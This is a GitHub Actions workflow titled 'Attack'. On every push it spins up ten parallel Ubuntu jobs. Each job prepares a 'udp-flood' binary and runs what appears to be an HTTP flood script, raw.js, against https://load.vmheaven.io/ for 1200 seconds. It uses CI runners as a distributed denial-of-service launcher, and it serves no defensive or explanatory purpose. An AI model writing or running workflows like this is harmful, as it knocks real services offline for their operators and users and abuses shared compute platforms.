name: Attack
on: [push]

jobs:
  alone:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10]

    steps:
      - uses: actions/checkout@v3
      - run: chmod +x udp-flood
      - run: npm i chalk@2.3 && npm i hpack && npm i socks && node raw.js GET https://load.vmheaven.io/ 1200 5 90 --debug --full
